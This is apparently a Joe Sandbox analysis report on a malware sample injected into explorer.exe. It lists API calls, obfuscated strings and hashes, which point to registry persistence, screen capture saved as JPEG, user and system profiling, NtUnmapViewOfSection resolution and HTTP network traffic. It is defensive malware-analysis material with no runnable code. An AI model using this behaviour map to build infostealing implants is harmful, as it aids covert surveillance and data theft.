Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
Instruction ID: 47f34889c8536e0dff849bc9c84cfc9ba2cee898cc930745a86d305a9c3c3ab7
Opcode Fuzzy Hash: 25e051ee84f5a1836dda3222278f4334694447e0a98cf775cf13d888adafe703
Instruction Fuzzy Hash: 3D012D74600109BBCB10DE58CC91F9AB3B9AF88714F20C154FE189B381D631EE02DB90

Function 00631A2D Relevance: 1.5, APIs: 1, Instructions: 25
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006324BD: GlobalAlloc.KERNELBASE(?,?,?), ref: 006324ED

LoadLibraryW.KERNELBASE(?), ref: 00631A5E

Memory Dump Source

Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID: AllocGlobalLibraryLoad
String ID:
API String ID: 3361179946-0
Opcode ID: 1feaf0e274cf16ef0741fa9d108665e6c366966b39e006d739153cc267d6f199
Instruction ID: e6a8e9eb5ddc53e289ffc9fd25be50e8bec4f8659fe4ffc4fa7109d8bd5f3ae7
Opcode Fuzzy Hash: 1feaf0e274cf16ef0741fa9d108665e6c366966b39e006d739153cc267d6f199
Instruction Fuzzy Hash: D0E0ED75E00208BBCB40EFA8DD8299D7BF9AF48301F108198F9089B341E631AA118BD1

Function 006324BD Relevance: 1.3, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNELBASE(?,?,?), ref: 006324ED

Memory Dump Source

Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
Instruction ID: 0d6fe219c5b771053ed1ca33ae3d9df49f3793674d0b96cc3457159f015ea55b
Opcode Fuzzy Hash: 9e5e02ec3ae36198606aa10b822d832cfef97aae54456fdc6b76e3fc24730506
Instruction Fuzzy Hash: 0FF02278614209EFCB44DF99D590999B7A5EB48360F10C299AC198B341D631EE81DB94

Function 0050DFE1 Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1373506097.000000000050D000.00000020.00000001.01000000.00000003.sdmp, Offset: 0050D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50d000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cb9366395d1bde9188d8c533a5f261ceadb32812a651fb702a2e83f45a32b03
Instruction ID: 3f40fd10d4d425bea92e2e31a8384655c7c611b504f6dcc443eaa3331804b236
Opcode Fuzzy Hash: 7cb9366395d1bde9188d8c533a5f261ceadb32812a651fb702a2e83f45a32b03
Instruction Fuzzy Hash: 35513074A00205EFC700EFA5C986AAEBBB5FF48314F614869F800A73A1CB75AD41DB55

Function 0050E188 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1373506097.000000000050D000.00000020.00000001.01000000.00000003.sdmp, Offset: 0050D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50d000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d169ef1900046f7ce7e1bf77e8748954ffc49c1ae63b66a47293057210f428
Instruction ID: bf7e67a2ca14f9f88d5219543bbc34b5992b7d1d8ea4abcf1bf777d69265ae53
Opcode Fuzzy Hash: 09d169ef1900046f7ce7e1bf77e8748954ffc49c1ae63b66a47293057210f428
Instruction Fuzzy Hash: 73C04C396082059FE709DA95E95745C7BA4F7C47207B149A6E44092684D6345D018514

Function 0050E1A6 Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1373506097.000000000050D000.00000020.00000001.01000000.00000003.sdmp, Offset: 0050D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50d000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575cfdc9971c75ce22d5e503515edcdbe57f5f9347646bd74705614b1379d254
Instruction ID: 377e0cd95b83e3719a63b237e411648d2ddc939ecfa33f4c2e7b80880894d1c9
Opcode Fuzzy Hash: 575cfdc9971c75ce22d5e503515edcdbe57f5f9347646bd74705614b1379d254
Instruction Fuzzy Hash: 5FB01138A0000AEBCF08EA80C08B88CBF32BB88300BB00E80A080222808230AE00AA00

Non-executed Functions

Function 00630739 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c93d8e922dfcd83e32f5765afd578857df8e1b348044725a28ebc662ede8c71c
Instruction ID: c2ae97a1311e7220a76ef33778c4fd8d15fcd70bd0b75679caa397bf8e8ee31d
Opcode Fuzzy Hash: c93d8e922dfcd83e32f5765afd578857df8e1b348044725a28ebc662ede8c71c
Instruction Fuzzy Hash: F7B17B71A001099BEF18DE68D8A17ED77B3FB84314F1981BCD84697B86D634AD96CBC0

Function 00632BED Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1373506097.0000000000630000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_BGUO31BLG4WQAOX9MA4VF71OJ1M.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

Analysis Process: explorer.exePID: 316, Parent PID: 1356COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	26.9%
Total number of Nodes:	1365
Total number of Limit Nodes:	9

Executed Functions

Function 02EE61F0 Relevance: 99.7, APIs: 40, Strings: 16, Instructions: 1737registrywindowfileCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6
RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 02EE64E3
RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 02EE6511
RegCloseKey.ADVAPI32(80000001), ref: 02EE651A
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 02EE663C
RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 02EE665F

Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 02EE67BD
Part of subcall function 02EE61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02EE6894
Part of subcall function 02EE61F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 02EE68E0

RegCloseKey.ADVAPI32(80000002), ref: 02EE6668
RegCloseKey.ADVAPI32(?), ref: 02EE6D5E
GdiplusStartup.GDIPLUS(?,?,00000000,F48E75C7,00000000), ref: 02EE6DEA
GetDC.USER32(00000000), ref: 02EE6F62
RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE71CD
GetSystemMetrics.USER32(00000000), ref: 02EE7226
GetSystemMetrics.USER32(00000000), ref: 02EE722F
RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 02EE7277
GetSystemMetrics.USER32(00000001), ref: 02EE72CA
GetSystemMetrics.USER32(00000001), ref: 02EE72D3
CreateCompatibleDC.GDI32(?), ref: 02EE72DF
CreateCompatibleBitmap.GDI32(?,?,?), ref: 02EE72F4
SelectObject.GDI32(00000000,00000000), ref: 02EE7304
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02EE732A
GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 02EE733E
GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 02EE735A
GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 02EE7387
GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 02EE740E
SelectObject.GDI32(00000000,?), ref: 02EE741B
DeleteObject.GDI32(00000000), ref: 02EE7428
DeleteObject.GDI32(?), ref: 02EE7430
ReleaseDC.USER32(00000000,?), ref: 02EE743A
GdipDisposeImage.GDIPLUS(00000000), ref: 02EE7441
GdiplusShutdown.GDIPLUS(?), ref: 02EE74E3
GetUserNameA.ADVAPI32(?,?), ref: 02EE75BA
LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 02EE7600
GetSidIdentifierAuthority.ADVAPI32(?), ref: 02EE760D
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02EE7721
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 02EE7748

Strings

RDErDuyXCkB=, xrefs: 02EE69EE
RDErDuyXCUd=, xrefs: 02EE698C
0mpfQN7GHB==, xrefs: 02EE6FA9
OS5n5H==, xrefs: 02EE76A8
, xrefs: 02EE8140
2DErDuy=, xrefs: 02EE6F81
Zy4g3ySq, xrefs: 02EE761C
invalid stoi argument, xrefs: 02EE8057
RDErDuyXCkF=, xrefs: 02EE6A53
NtUnmapViewOfSection, xrefs: 02EE8158
QSZn5H==, xrefs: 02EE7751
(, xrefs: 02EE8206
stoi argument out of range, xrefs: 02EE8048
image/jpeg, xrefs: 02EE73A2
RDErDuyXC3R=, xrefs: 02EE6AB4
ntdll.dll, xrefs: 02EE815D

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
String ID: $($0mpfQN7GHB==$2DErDuy=$NtUnmapViewOfSection$OS5n5H==$QSZn5H==$RDErDuyXC3R=$RDErDuyXCUd=$RDErDuyXCkB=$RDErDuyXCkF=$Zy4g3ySq$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
API String ID: 1729688432-835794773
Opcode ID: 9d78124ac42f59eb4e5ad6d9a9163f1c240e682e9e1ff8ec1cf81bf9e2469525
Instruction ID: 5f8fbeadde2e466a049a73e561e8d321a4fb61957308eea6f164196fefd11d3d
Opcode Fuzzy Hash: 9d78124ac42f59eb4e5ad6d9a9163f1c240e682e9e1ff8ec1cf81bf9e2469525
Instruction Fuzzy Hash: B0D23671A402189FEF18DF24CC84BDDBB7AEF55344F508298E50AA72D1DB749A94CF90

Function 02EEB700 Relevance: 32.7, APIs: 12, Strings: 6, Instructions: 1232COMMON

Download Yara Rule

APIs

Part of subcall function 02EEA270: GetTempPathA.KERNEL32(00000104,?,F48E75C7,?,00000000), ref: 02EEA2B7

GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 02EEB77B

Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE639C
Part of subcall function 02EE61F0: RegQueryValueExA.KERNELBASE(F48E75C7,?,00000000,00000000,?,00000400,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63CA
Part of subcall function 02EE61F0: RegCloseKey.KERNELBASE(F48E75C7,?,?,00000000,00000001,F48E75C7,F48E75C7), ref: 02EE63D6

GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEB8B5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEB9EF

Part of subcall function 02EE61F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 02EE64E3
Part of subcall function 02EE61F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 02EE6511
Part of subcall function 02EE61F0: RegCloseKey.ADVAPI32(80000001), ref: 02EE651A

GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEBB29
GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEBC63

Part of subcall function 02EE61F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 02EE663C
Part of subcall function 02EE61F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 02EE665F
Part of subcall function 02EE61F0: RegCloseKey.ADVAPI32(80000002), ref: 02EE6668

GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEBD9D
GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEBED7

Part of subcall function 02EE61F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 02EE67BD

GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEC011

Part of subcall function 02EE61F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 02EE6894
Part of subcall function 02EE61F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 02EE68E0

GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEC14B
GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEC285
GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 02EEC3BF

Part of subcall function 02EE61F0: RegCloseKey.ADVAPI32(?), ref: 02EE6D5E

GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 02EEC4FF

Part of subcall function 02EE93D0: GetVersionExW.KERNEL32(0000011C,F48E75C7,76F90F00), ref: 02EE944A
Part of subcall function 02EE93D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE94AB
Part of subcall function 02EE93D0: GetProcAddress.KERNEL32(00000000), ref: 02EE94B2

Part of subcall function 02EE93D0: GetNativeSystemInfo.KERNELBASE(?), ref: 02EE9573

Part of subcall function 02EE93D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE9577

Strings

VV3C, xrefs: 02EEBE94
Ymct5x7r, xrefs: 02EEC242
V2co3TPs, xrefs: 02EEC4B6
VX3k4dC=, xrefs: 02EEB872
WVRAMr==, xrefs: 02EEBAE6
Z2cr2x7w, xrefs: 02EEC37C

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
String ID: V2co3TPs$VV3C$VX3k4dC=$WVRAMr==$Ymct5x7r$Z2cr2x7w
API String ID: 3951112935-1902282912
Opcode ID: ad151dc17bace9eea8ae247c61e31c9f9802caa76197fca31d75c36851326879
Instruction ID: a36ee7edca638610192b8927e5e989b6a433b7c5839ec652d23b49b10359af55
Opcode Fuzzy Hash: ad151dc17bace9eea8ae247c61e31c9f9802caa76197fca31d75c36851326879
Instruction Fuzzy Hash: 30924671A801089BEF08DBB8CD887DDBB72AF46318F64E21DE056B73D5D7758A808B51

Function 02EEE8D0 Relevance: 26.8, APIs: 8, Strings: 7, Instructions: 600
comtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32(?,?), ref: 02EEE91D
CoInitialize.OLE32(00000000), ref: 02EEEC52
CoCreateInstance.OLE32(02F3D05C,00000000,00000001,02F3D0BC,?), ref: 02EEEC71
CoUninitialize.OLE32 ref: 02EEEC7F
CoUninitialize.OLE32 ref: 02EEF053
CoUninitialize.OLE32 ref: 02EEF06A
GetLocalTime.KERNEL32(?), ref: 02EEF16C
CoUninitialize.OLE32 ref: 02EEF240

Strings

QS4It8==, xrefs: 02EEFB33
ZEcOMr==, xrefs: 02EEFDF6, 02EF0458
IQsoCJYqBTT=, xrefs: 02EEFB5D
QS4oCJYq, xrefs: 02EEF8BE
fHVV4yK3Bz1=, xrefs: 02EF09C3
fHVV4umsBx==, xrefs: 02EF0922, 02EF0B84
@3P, xrefs: 02EEF1B7

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Uninitialize$CreateInitializeInstanceLocalNameTimeUser
String ID: @3P$IQsoCJYqBTT=$QS4It8==$QS4oCJYq$ZEcOMr==$fHVV4umsBx==$fHVV4yK3Bz1=
API String ID: 1302556198-3926215408
Opcode ID: dce80f8f484d0c8de88dbadc294e9807bae7fb1962661b468335931b49b13a1c
Instruction ID: 0de9f9f88575ec077dffd88b53f8dd24b3acb869ea3cf086c5d8061154599bae
Opcode Fuzzy Hash: dce80f8f484d0c8de88dbadc294e9807bae7fb1962661b468335931b49b13a1c
Instruction Fuzzy Hash: FD427D71A402589FDF25CF24CC88BDDBBB6AF49308F5081D8E509A7291DB75AAC4CF91

Function 02EF0370 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 312
networkfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000005DC,F48E75C7,?,00000000), ref: 02EF0402
InternetOpenW.WININET(02F3CC08,00000000,00000000,00000000,00000000), ref: 02EF0411
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02EF0435
HttpOpenRequestA.WININET(?,00000000), ref: 02EF047F
HttpSendRequestA.WININET(?,00000000), ref: 02EF053F
InternetReadFile.WININET(?,?,000003FF,?), ref: 02EF05F1
InternetReadFile.WININET(?,00000000,000003FF,?), ref: 02EF06A0
InternetCloseHandle.WININET(?), ref: 02EF06C7
InternetCloseHandle.WININET(?), ref: 02EF06CF
InternetCloseHandle.WININET(?), ref: 02EF06D7

Strings

ZEcOMr==, xrefs: 02EEFDF6, 02EF0458
stoi argument out of range, xrefs: 02EF29CA
fHVV4yK3Bz1=, xrefs: 02EF09C3
fHVV4umsBx==, xrefs: 02EF0922, 02EF0B84
invalid stoi argument, xrefs: 02EF29D4

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
String ID: ZEcOMr==$fHVV4umsBx==$fHVV4yK3Bz1=$invalid stoi argument$stoi argument out of range
API String ID: 1439999335-753573995
Opcode ID: cbfe06fc437f9fc3735669152c9b7d708131f768244ed990d90be75587423eb2
Instruction ID: 54686e522c34232110aac825fedffcf4952f34e65e4a3cf47d2722fcead446a2
Opcode Fuzzy Hash: cbfe06fc437f9fc3735669152c9b7d708131f768244ed990d90be75587423eb2
Instruction Fuzzy Hash: 0EB126B1A401589BEB24DF28CC84B9DBB76EF41348F5081A9F609972D6DB70DAC0CF95

Function 02EE93D0 Relevance: 18.0, APIs: 6, Strings: 4, Instructions: 473
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,F48E75C7,76F90F00), ref: 02EE944A
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE94AB
GetProcAddress.KERNEL32(00000000), ref: 02EE94B2
GetNativeSystemInfo.KERNELBASE(?), ref: 02EE9573
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE9577

Strings

RjEtD8==, xrefs: 02EE97DA
RjEsFH==, xrefs: 02EE9732
RjEtEH==, xrefs: 02EE9882
RjEsE8==, xrefs: 02EE992A

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID: RjEsE8==$RjEsFH==$RjEtD8==$RjEtEH==
API String ID: 374719553-2519641472
Opcode ID: 2fd87d99b269ff253d3b652cbfb2a7d0fcc2b2790bb72444289e43bf75b5b0d1
Instruction ID: 580c2996877d762b29969a065636deb45327971d001855ea3354e72db1b4c8ff
Opcode Fuzzy Hash: 2fd87d99b269ff253d3b652cbfb2a7d0fcc2b2790bb72444289e43bf75b5b0d1
Instruction Fuzzy Hash: B9026BB0E40248ABDF14BB68CD5679D7BB6AB51714F90829CE407673C2EB754E808FD2

Function 02F1E6D1 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,02F1E8F2,?,?,00000000), ref: 02F1E743
_free.LIBCMT ref: 02F1E731

Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E

_free.LIBCMT ref: 02F1E8FB

Strings

Eastern Summer Time, xrefs: 02F1E7F0
Eastern Standard Time, xrefs: 02F1E7DC

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 2155170405-239921721
Opcode ID: e1b42f708e17c9959c78a3e9ee7413a478760475ee0aee3b583d7d56e08c5316
Instruction ID: 90027782fc6dee8c66ad8bf6e8d615e7098068ad5e67f987035569b902d3717e
Opcode Fuzzy Hash: e1b42f708e17c9959c78a3e9ee7413a478760475ee0aee3b583d7d56e08c5316
Instruction Fuzzy Hash: B8514976D00229ABDB24BF65DC45A9EBFB9EF047E0F504566EB14E7180EB709A10CF90

Function 02EE91B0 Relevance: 6.3, APIs: 4, Instructions: 324
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,F48E75C7,76F90F00), ref: 02EE944A
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02EE94AB
GetProcAddress.KERNEL32(00000000), ref: 02EE94B2
GetNativeSystemInfo.KERNELBASE(?), ref: 02EE9573

Memory Dump Source

Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd

Similarity

API ID: AddressHandleInfoModuleNativeProcSystemVersion
String ID:
API String ID: 2167034304-0
Opcode ID: d470458a85928f37324b285e1e8bd1ab350df2c6e8071c181a50c59678cd78a5
Instruction ID: ca3b8b31f791eb7a7ed88adbdeefef2a053e757c6f33938dec98bda1c1dfbfdf
Opcode Fuzzy Hash: d470458a85928f37324b285e1e8bd1ab350df2c6e8071c181a50c59678cd78a5
Instruction Fuzzy Hash: 7FC10671E002089BEF18DF68CDC4B9DBBB6EF45314F508658E8069B2C6DB74DA84CB91

Function 02EFF060 Relevance: 40.1, APIs: 4, Strings: 18, Instructions: 1574registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02EE61F0: GetUserNameA.ADVAPI32(?,?), ref: 02EE75BA
Part of subcall function 02EE61F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 02EE7600
